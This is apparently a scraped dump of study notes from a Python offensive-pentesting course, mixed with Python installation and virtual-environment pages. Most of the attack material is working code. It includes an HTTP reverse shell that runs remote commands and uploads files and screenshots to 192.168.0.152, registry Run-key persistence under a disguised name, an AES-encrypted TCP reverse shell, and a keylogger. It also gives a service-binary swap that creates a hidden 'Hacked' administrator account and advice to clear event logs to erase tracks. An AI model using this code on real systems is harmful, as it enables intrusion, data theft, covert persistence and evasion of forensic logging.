              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\n\nfrom PIL import ImageGrab # Used to grab a screenshot\nimport tempfile           # Used to create a temp directory\nimport shutil             # Used to remove the temp directory\n\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    elif 'screencap' in command: # If we got a screencap keyword, then ...\n\n        dirpath = tempfile.mkdtemp() # Create a temp dir to store our screenshot file\n        ImageGrab.grab().save(os.path.join(dirpath, \"img.jpg\"), \"JPEG\") # Save the screen capture in the temp dir\n\n        url = \"http://192.168.0.152:8080/store\"\n        files = {'file': open(os.path.join(dirpath, \"img.jpg\"), 'rb')}\n        r = requests.post(url, files=files) # Transfer the file over our HTTP channel\n\n        files['file'].close() # Once the file gets transferred, close it\n        shutil.rmtree(dirpath) # Remove the entire temp dir\n\n    else:\n        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-your-binary-persistent/","title":"Making your binary persistent","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course

              In order for a binary to persist, the binary must do three things:

              1. Copy itself to a different location. We need a source path (the current working directory) and a destination path, for instance the Documents folder. This means we need to know the username:

              ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

              2. Add a registry key pointing to the new exe location. This is done only the first time.

              3. On subsequent runs, avoid repeating steps 1 and 2.

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#phases-for-persistence","title":"Phases for persistence","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#1-system-recognition","title":"1. System recognition","text":"

              Getting to know the current working directory + the user profile.
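
              A minimal sketch of this recognition step (assuming a Windows target):

              import os\n\npath = os.getcwd() # source path: the directory the binary currently runs from\nuserprof = os.environ.get('USERPROFILE') # e.g. C:\\Users\\<username>\nprint(path, userprof)\n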

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#2-copy-the-binary-to-a-different-location","title":"2. Copy the binary to a different location","text":"

              If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

              We will copy the binary to a different location. For that, we need a source path (the current working directory) and a destination path, for instance the Documents folder. This means we need to know the current working directory (for the source path) and the username (for the destination path):

              ```cmd\n    c:\\Users\\<username>\\Documents\n```\n

              This information was already retrieved in step 1 (System recognition).
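
              A minimal sketch of this copy step (client.exe is a placeholder for our binary's name):

              import os\nimport shutil\n\npath = os.getcwd()\nuserprof = os.environ.get('USERPROFILE')\ndestination = os.path.join(userprof, 'Documents', 'client.exe')\n\nif not os.path.exists(destination): # first run: the binary is not in the destination yet\n    shutil.copyfile(os.path.join(path, 'client.exe'), destination)\n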

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#3-add-a-registry-key","title":"3. Add a Registry key","text":"

              If the binary is not found in the destination folder, we can assume this is the first time we're running it. Then:

              We will add a Registry key.
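
              A minimal sketch of the registry step (RegUpdater is just an innocuous-looking value name; destination is the path used in step 2):

              import os\nimport winreg as wreg\n\ndestination = os.path.join(os.environ.get('USERPROFILE'), 'Documents', 'client.exe')\n\n# every value under HKCU\\...\\Run is executed at user logon\nkey = wreg.OpenKey(wreg.HKEY_CURRENT_USER, \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, wreg.KEY_ALL_ACCESS)\nwreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ, destination)\nkey.Close()\n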

              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#4-fire-up-our-shell","title":"4. Fire up our shell","text":"","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/making-your-binary-persistent/#client-side","title":"Client side","text":"

              To be run on our victim's machine.

              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport os\nimport subprocess\nimport time\nimport shutil \nimport winreg as wreg\n\n# Recon phase\npath = os.getcwd()\n\nNull, userprof = subprocess.check_output('set USERPROFILE', shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE).decode().split('=')\n\ndestination = userprof.strip('\\n\\r') + '\\\\Documents\\\\' + 'client.exe'\n\n# If this is the first time our backdoor gets executed, do phase 1 and phase 2\nif not os.path.exists(destination):\n    shutil.copyfile(path + '\\\\client.exe', destination) # you can replace path + '\\\\client.exe' with sys.argv[0], which returns the file name\n\n    key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\", 0, wreg.KEY_ALL_ACCESS)\n    wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ, destination)\n    key.Close()\n\n\n\n# Last phase: start a reverse connection back to our Kali machine\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    else:\n        CMD = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
              ","tags":["python","python pentesting","scripting","reverse shell","persistence","registry"]},{"location":"python/man-in-the-browser-attack/","title":"Man in the browser attack","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course

              All browsers offer to save your username/password when you submit them on a login page, so the next time you visit the same login page your credentials are filled in automatically without you typing a single letter. Third-party software like LastPass can do the same job for you.

              If the target uses this method to log in, neither the keylogger nor the clipboard-monitoring method will work.

              Attackers have come up with an attack called man-in-the-browser to overcome this scenario.

              In a nutshell, a man-in-the-browser attack intercepts the browser's API calls and extracts the data in clear text, before it leaves through the network socket (where it becomes SSL-encrypted).

              ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/man-in-the-browser-attack/#steps-to-intercept-a-process-api-calls-are-","title":"Steps to intercept a process API calls are:-","text":"

              A. Get the Process ID (PID) of the browser process

              B. Attach a debugger to this PID

              C. Specify the DLL library that you want to intercept

              D. Specify the function name and resolve its memory address

              E. Set a breakpoint and register a callback function

              F. Wait for debug events using a debug loop

              G. Once the debug event occurs (meaning once the browser calls the function inside the DLL), execute the callback function

              H. Return control to the original process
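
              A minimal sketch of steps A, B and F using ctypes (an illustrative skeleton only: the PID is assumed to be known, the DEBUG_EVENT union is kept as an oversized opaque buffer, and the DLL/breakpoint logic of steps C-E and G is left out):

              import ctypes\nfrom ctypes import wintypes\n\nkernel32 = ctypes.windll.kernel32\nDBG_CONTINUE = 0x00010002\nINFINITE = 0xFFFFFFFF\n\nclass DEBUG_EVENT(ctypes.Structure): # minimal layout; the trailing union is opaque and deliberately oversized\n    _fields_ = [(\"dwDebugEventCode\", wintypes.DWORD),\n                (\"dwProcessId\", wintypes.DWORD),\n                (\"dwThreadId\", wintypes.DWORD),\n                (\"u\", ctypes.c_byte * 256)]\n\npid = 1234 # hypothetical browser PID (step A would grab it, e.g. from the process list)\nif not kernel32.DebugActiveProcess(pid): # step B: attach a debugger to the PID\n    raise ctypes.WinError()\n\nevent = DEBUG_EVENT()\nwhile kernel32.WaitForDebugEvent(ctypes.byref(event), INFINITE): # step F: the debug loop\n    # step G would inspect breakpoint events here and run the callback\n    kernel32.ContinueDebugEvent(event.dwProcessId, event.dwThreadId, DBG_CONTINUE)\n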

              ","tags":["python","python pentesting","techniques","firefox","browsers"]},{"location":"python/pip/","title":"Pip","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#installation","title":"Installation","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#basic-usage","title":"Basic usage","text":"","tags":["python","scripting","package manager"]},{"location":"python/pip/#some-interesting-libraries","title":"Some interesting libraries","text":"Library What it does Install More Info Pillow Pillow\u00a0and its predecessor,\u00a0PIL, are the original Python\u00a0libraries for dealing with images. pip install Pillow https://realpython.com/image-processing-with-the-python-pillow-library/","tags":["python","scripting","package manager"]},{"location":"python/privilege-escalation/","title":"Privilege escalation - Weak service file permission","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#setting-up-the-lab","title":"Setting up the lab","text":"

              1. Download the vulnerable application from https://www.exploit-db.com/exploits/24872 and install it for all users on a Windows VM.

              2. Create a non-admin account in the Windows VM, for instance user nonadmin with password 123123.

              3. Restart the Windows VM and log in as the nonadmin user.

              4. Open the Photodex application and, in Task Manager, locate the service the application creates. It's called ScsiAccess.

              5. Open the properties of the ScsiAccess service and locate the path to the executable. It should be something like:

              C:\\Program Files\\Photodex\\ProShow Producer\\ScsiAccess.exe\n

              6. We can replace that file with a malicious service file that will be triggered when the Photodex application starts, escalating us to admin privileges.

              7. Script for the Windows 7 app (for Windows 10, go to step 8). After this step, jump to step 9.

              # Windows 7\nimport servicemanager\nimport win32serviceutil\nimport win32service\nimport win32api\n\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPED)\n\n    def start(self):\n        self.runflag=True\n\n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

              We can use py2exe to craft an exe file from that Python script.

              This setup file will convert the Python script scsiaccess.py into an exe file:

              from distutils.core import setup\nimport py2exe, sys, os\n\nsys.argv.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfile = None\n)\n

              You can also use pyinstaller:

              pyinstaller --onefile Create_New_Admin_account.py\n

              8. Script for Windows 10:

              # The order of importing libraries matters: \"servicemanager\" should be imported after the win32X modules, as follows:\n\nimport win32serviceutil\nimport win32service\nimport win32api\nimport win32timezone\nimport win32net\nimport win32netcon\nimport servicemanager\n\n## the rest of the code is still the same\nimport os\nimport ctypes\n\nclass Service(win32serviceutil.ServiceFramework):\n    _svc_name_ = 'ScsiAccess'\n    _svc_display_name_ = 'ScsiAccess'\n\n    def __init__(self, *args):\n        win32serviceutil.ServiceFramework.__init__(self, *args)\n\n    def sleep(self, sec):\n        win32api.Sleep(sec*1000, True)\n\n    def SvcDoRun(self):\n\n        self.ReportServiceStatus(win32service.SERVICE_START_PENDING)\n        try:\n            self.ReportServiceStatus(win32service.SERVICE_RUNNING)\n            self.start()\n\n        except:\n            self.SvcStop()\n    def SvcStop(self):\n        self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)\n        self.stop()\n        self.ReportServiceStatus(win32service.SERVICE_STOPPED)\n\n    def start(self):\n        self.runflag=True\n\n        USER = \"Hacked\"\n        GROUP = \"Administrators\"\n        user_info = dict (\n            name = USER,\n            password = \"python\",\n            priv = win32netcon.USER_PRIV_USER,\n            home_dir = None,\n            comment = None,\n            flags = win32netcon.UF_SCRIPT,\n            script_path = None\n             )\n        user_group_info = dict (\n            domainandname = USER\n            )\n        try:\n            win32net.NetUserAdd (None, 1, user_info)\n            win32net.NetLocalGroupAddMembers (None, GROUP, 3, [user_group_info])\n        except Exception:\n            pass\n        ''' \n        f = open('C:/Users/nonadmin/Desktop/priv.txt', 'w')\n        if ctypes.windll.shell32.IsUserAnAdmin() == 0:\n            f.write('[-] We are NOT admin')\n        else:\n            f.write('[+] We are admin')\n        f.close()\n        '''\n    def stop(self):\n        self.runflag=False\n\nif __name__ == '__main__':\n\n\n    servicemanager.Initialize()\n    servicemanager.PrepareToHostSingle(Service)\n    servicemanager.StartServiceCtrlDispatcher()\n    win32serviceutil.HandleCommandLine(Service)\n

              To export into an EXE use:

              pyinstaller --onefile Create_New_Admin_account.py\n

              9. Replace the service file under

              C:\\Program Files (x86)\\Photodex\\ProShow Producer\n

              10. Rename the original scsiaccess to scsiaccess123.

              11. Put your Python exe there as scsiaccess (without .exe).

              12. Restart and test. You should see that the \"Hacked\" account has been created.
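
              The swap in steps 9-11 looks roughly like this from a shell in the service folder (a sketch; the source path of our PyInstaller output is hypothetical):

              cd \"C:\\Program Files (x86)\\Photodex\\ProShow Producer\"\nREM step 10: keep the original service binary around\nren ScsiAccess.exe ScsiAccess123.exe\nREM step 11: drop the PyInstaller output in place of the service binary\ncopy C:\\Users\\nonadmin\\Desktop\\dist\\scsiaccess.exe scsiaccess\n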

              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#python-script-to-check-if-we-are-admin-users-on-windows","title":"Python script to check if we are admin users on Windows","text":"
              import ctypes\n\nif ctypes.windll.shell32.IsUserAnAdmin() == 0:\n    print('[-] We are NOT admin!')\nelse:\n    print('[+] We are admin :)')\n
              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/privilege-escalation/#erasing-tracks","title":"Erasing tracks","text":"

              Once you are admin, open Event Viewer and go to Windows Logs. Right-click the Application and Security logs and choose the \"Clear Log\" option.
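
              The same cleanup can be scripted instead of clicking through Event Viewer (a sketch using the built-in wevtutil tool; it needs the admin rights we just gained):

              import subprocess\n\nfor log in ('Application', 'Security'):\n    subprocess.run(['wevtutil', 'cl', log], check=True) # wevtutil cl <logname> clears an event log\n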

              ","tags":["python","python pentesting","scripting","windows privilege escalation","privilege escalation"]},{"location":"python/pyenv/","title":"Pyenv","text":"

              Pyenv is a popular Python version management tool. It lets you easily install and switch between multiple Python versions on the same machine.

              Source: https://github.com/pyenv/pyenv

              "},{"location":"python/pyenv/#installation-in-kali","title":"Installation in Kali","text":"

              Check out Pyenv where you want it installed. A good place to choose is $HOME/.pyenv (but you can install it somewhere else):

              git clone https://github.com/pyenv/pyenv.git ~/.pyenv\n

              Optionally, try to compile a dynamic Bash extension to speed up Pyenv. Don't worry if it fails; Pyenv will still work normally:

              cd ~/.pyenv && src/configure && make -C src\n

              Define the environment variable PYENV_ROOT to point to the path where Pyenv will store its data. $HOME/.pyenv is the default. If you installed Pyenv via a Git checkout, we recommend setting it to the same location you cloned it to.

              echo 'export PYENV_ROOT=\"$HOME/.pyenv\"' >> ~/.zshrc\n

              Add the pyenv executable to your PATH if it's not already there:

              echo 'command -v pyenv >/dev/null || export PATH=\"$PYENV_ROOT/bin:$PATH\"' >> ~/.zshrc \n

              Run eval \"$(pyenv init -)\" to install pyenv into your shell as a shell function and enable shims and autocompletion:

              echo 'eval \"$(pyenv init -)\"' >> ~/.zshrc \n

              Then, if you have ~/.profile, ~/.bash_profile or ~/.bash_login, add the commands there as well. If you have none of these, add them to ~/.profile. That's not needed in our case, since we use ~/.zshrc.

              If you wish to get Pyenv in noninteractive login shells as well, also add the commands to ~/.zprofile or ~/.zlogin.

              "},{"location":"python/pyenv/#basic-usage","title":"Basic usage","text":"

              Install the desired Python versions using pyenv:

              pyenv install 3.9.0\n

              See installed versions:

              pyenv versions\n

              Set global python version:

               pyenv global 2.7.18\n
              "},{"location":"python/python-installation/","title":"Installing python","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-38-on-ubuntu-20045","title":"Installing python 3.8 on Ubuntu 20.04.5","text":"

              First, update and upgrade:

              sudo apt update && sudo apt upgrade\n

              Add the PPA for old Python versions. Old versions of Python such as 3.9, 3.8, 3.7 and older are not available from the default system repository of Ubuntu 22.04 LTS (Jammy Jellyfish) or 20.04 (Focal Fossa), so we need to add the PPA offered by the \"deadsnakes\" team to get the archived Python versions easily.

              sudo apt install software-properties-common\n
              sudo add-apt-repository ppa:deadsnakes/ppa\n\n# If you get this error:\nAttributeError: NoneType object has no attribute people\n# Try Installing  python3-launchpadlib \nsudo apt-get install  python3-launchpadlib \n

              Check python versions you want. Syntax:

              sudo apt-cache policy python<version>\n

              In my case:

              sudo apt-cache policy python3.9\n

              Install the version you want:

              sudo apt install python3.9\n

              Set up a default version in your system:

              # Check out existing versions\nls /usr/bin/python*\n\n# Also, let's check whether any version is configured as a python alternative. For that, run:\nsudo update-alternatives --list python\n\n# If the output is \"update-alternatives: error: no alternatives for python\", no alternatives have been configured yet, so let's set some up:\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.9 1\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.10 2\nsudo update-alternatives --install /usr/bin/python python /usr/bin/python3.8 3\n\n# Switch the default Python version\nsudo update-alternatives --config python\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#other-methods","title":"Other methods","text":"

              Not very orthodox, but:

              # Check current Python pointer\nls -l /usr/bin/python\n\n# Check available Python versions\nls -l /usr/bin/python*\n\n# Unlink current python version\ncd /usr/bin\nsudo unlink python\n\n# Select the required python version and link it to the python command\nsudo ln -s /usr/bin/python2.7 python\n\n# Confirm the change in the pointer\nls -l /usr/bin/python\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-python-in-kali","title":"Installing python in Kali","text":"

              If you are on Ubuntu 19.10 (or any other version unsupported by the deadsnakes PPA, as is the case with Kali), you will not be able to install Python using the deadsnakes PPA.

              First, install the development packages required to build Python.

              sudo apt update\nsudo apt install build-essential zlib1g-dev libncurses5-dev libgdbm-dev libnss3-dev libssl-dev libreadline-dev libffi-dev curl\n

              Then download the tarball and extract it:

              wget https://www.python.org/ftp/python/3.9.19/Python-3.9.19.tar.xz\ntar -xf Python-3.9.19.tar.xz\n

              Once the Python tarball has been extracted, navigate to the configure script and execute it in your Linux terminal with:

              cd Python-3.9.19\n./configure\n

              The configuration may take some time. Wait until it finishes successfully before proceeding.

              If you want to create an alternative install of Python, start the build process:

              sudo make altinstall\n

              If you want to replace your current version of Python with this new version, you should uninstall your current Python package using your package manager (such as apt or dnf) and then install:

              sudo make install\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-pip","title":"Installing pip","text":"
              python3 -m pip install pip\n

              If you get the error externally-managed-environment, the solution is to create a virtual environment. As the message explains, this is not an issue with Python itself, but rather your Linux distribution (Kali, Debian, etc.) implementing a deliberate policy to ensure you don't break your operating system and system packages by using pip (or Poetry, Hatch, PDM or another non-OS package manager) outside the protection of a virtual environment.
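
              A minimal sketch of that workaround (the environment path ~/.venvs/tools is just an example):

              python3 -m venv ~/.venvs/tools\nsource ~/.venvs/tools/bin/activate\npython3 -m pip install --upgrade pip\n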

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#creating-a-virtual-environment","title":"Creating a virtual environment","text":"

              See virtual Environments.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#switch-python-versions","title":"Switch python versions","text":"

              See pyenv.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-keylogger/","title":"Simple keylogger in python","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n#Ref: https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard\n\nfrom pynput.keyboard import Key, Listener\n\ndef on_press(key):\n    fp=open(\"keylogs.txt\",\"a\") # open the log file and append the key to it\n    print(key)\n    fp.write(str(key)+\"\\n\")\n    fp.close()\n\nwith Listener(on_press=on_press) as listener: # if a key is pressed, call the on_press function\n    listener.join()\n
              ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/python-tools-for-pentesting/","title":"Python tools for pentesting","text":"

              Tools and techniques for:

              • Coding your own reverse shell (TCP + HTTP).
              • Exfiltrating data from the victim's machine.
              • Using anonymous shells by abusing Twitter, Google Forms and SourceForge.
              • Hacking passwords with different techniques: coding a keylogger, performing clipboard hijacking.
              • Bypassing some firewalls by adding cryptographic encryption to your shell scripts (AES, RSA, XOR).
              • Writing scripts to perform privilege escalation on Windows by abusing a weak service. And more.
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#contents","title":"Contents","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#tools","title":"Tools","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#pyinstaller","title":"pyinstaller","text":"

              PyInstaller bundles a Python application and all its dependencies into a single package. The user can run the packaged app without installing a Python interpreter or any modules.
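
              Typical usage looks like this (client.py is a placeholder script name; the bundled binary lands in the dist/ folder):

              pip install pyinstaller\npyinstaller --onefile client.py\n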

              See pyinstaller.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#py2exe","title":"py2exe","text":"

              This setup file will convert the Python script scsiaccess.py into an exe file:

              from distutils.core import setup\nimport py2exe, sys, os\n\nsys.argv.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfile = None\n)\n
              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#inmunity-debuger","title":"Inmunity Debuger","text":"

              See Immunity Debugger.

              ","tags":["python","python pentesting","scripting"]},{"location":"python/python-virtual-environments/","title":"Virtual environments","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#virtualenvwrapper","title":"virtualenvwrapper","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#installation","title":"Installation","text":"
              # Make sure you have pip installed.\nsudo apt-get install python3-pip\n\n# Installing virtualenvwrapper\nsudo pip3 install virtualenvwrapper\n\n# Open .bashrc:\nsudo gedit ~/.bashrc\n\n# After opening it, add the following lines to it:\n\nexport WORKON_HOME=$HOME/.virtualenvs\nexport PROJECT_HOME=$HOME/Devel\nsource /usr/local/bin/virtualenvwrapper.sh\n
              ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#basic-usage","title":"Basic usage","text":"
              # Creating a virtual environment with mkvirtualenv\nmkvirtualenv nameOfEnvironment\n\n# List existing environments\nlsvirtualenv -b\n\n# Work on an environment\nworkon nameOfEnvironment\n\n# Close the current environment\ndeactivate\n\n# Delete a virtual environment\nrmvirtualenv nameOfEnvironment\n\n# To work on another version of python:\nmkvirtualenv -p python3.x venv_name\n# You will see something like this: (venv_name)\n

              Backing up the virtual environment's package list before removing it:

              pip freeze > requirements.txt\n
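
              To restore those packages later into a fresh environment:

              pip install -r requirements.txt\n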
              ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#venv","title":"venv","text":"
              python3 -m venv <DIR>\nsource <DIR>/bin/activate\n

              On Windows, you can activate the virtual environment with the command below; run deactivate to leave it:

              <DIR>\\Scripts\\activate\n
              ","tags":["database","relational","database","SQL"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/","title":"TCP reverse shell with AES encryption","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

              from Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport socket\nimport subprocess\nkey = b\"H\" * 32\nIV = b\"H\" * 16\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = decrypt(s.recv(1024))\n        if 'terminate' in command.decode():\n             break\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n            s.send(encrypt(CMD.stdout.read()))\n\n\ndef main():\n    connect()\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#server-side","title":"Server side","text":"
              import socket\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16 # this must match the block size, which is 16 bytes\nkey = b\"H\" * 32 # 32 bytes for AES-256\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16) # the pad function adds the extra data needed so that the size of padded_message is 16 bytes or a multiple of 16, because cipher block chaining works on 16-byte blocks\n    encrypted_message = encryptor.encrypt(padded_message) \n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    conn, address = s.accept()\n    print('[+] We got a connection')\n    while True:\n\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send(encrypt(b'terminate'))\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            print(decrypt(conn.recv(1024)).decode())\ndef main():\n    connect()\n\nmain()\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#test","title":"Test","text":"
              # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nkey = b\"H\" * 32 #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.\nIV = b\"H\" * 16\n\ncipher = AES.new(key, AES.MODE_CBC, IV)\n\nmessage = \"Hello\"\npaddedmessage = Padding.pad(message.encode(), 16)\nencrypted = cipher.encrypt(paddedmessage)\n\nprint (encrypted)\n\n\ndecipher = AES.new(key, AES.MODE_CBC, IV)\npaddeddecrypted = decipher.decrypt(encrypted)\nunpaddedencrypted = Padding.unpad(paddeddecrypted, 16)\n\nprint(unpaddedencrypted.decode())\n
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/","title":"TCP reverse shell with hybrid encryption AES + RSA","text":"

              From course: Python For Offensive PenTest: A Complete Practical Course.

              General index of the course
              ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#client-side","title":"Client side","text":"

              To be run on the victim's machine.

